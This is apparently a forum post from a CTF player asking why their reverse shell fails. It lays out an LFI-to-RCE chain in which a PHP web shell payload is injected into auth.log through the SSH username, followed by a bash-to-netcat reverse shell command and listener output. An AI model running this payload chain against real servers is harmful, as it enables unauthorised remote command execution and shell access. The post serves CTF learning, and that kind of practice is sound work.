I am facing an issue with completing a CTF, There is an LFI vulnerability, which has helped me with SSH log poisoning and I can get php to run command over the web page that I want.
But the issue comes when I try to do a reverse shell access.Following are the steps I am taking:
- someurl.com/file.php?file=/var/log/auth.log --exploitable link
- now I do a ssh <?php system($_GET['command']); ?>@ip --This injects the code so I can now run system commands through command parameter.
- the 2nd step gives me all the system access through www account. I can run commands.
- Now while I try this : someurl.com/file.php?file=/var/log/auth.log&command=/bin/bash | nc ip-address 1337
and opens nc listener on my node, I get this :
root@sa:/# nc -lvp 1337
listening on [any] 1337 …
ip-address: inverse host lookup failed: Unknown host
connect to [my-ipaddress ] from (UNKNOWN) [someurl ip address] 58442
------It doesn’t show anything. I mean I do not see the banner as well, like we used to see when we inject.
I have tried the above php ssh command with system() , exec() and passthru()[this doesn’t help], but results are same each time.
I have tried using a reverse php shell too, but results are same.
Am I missing something here? Can anyone tell me where I am wrong?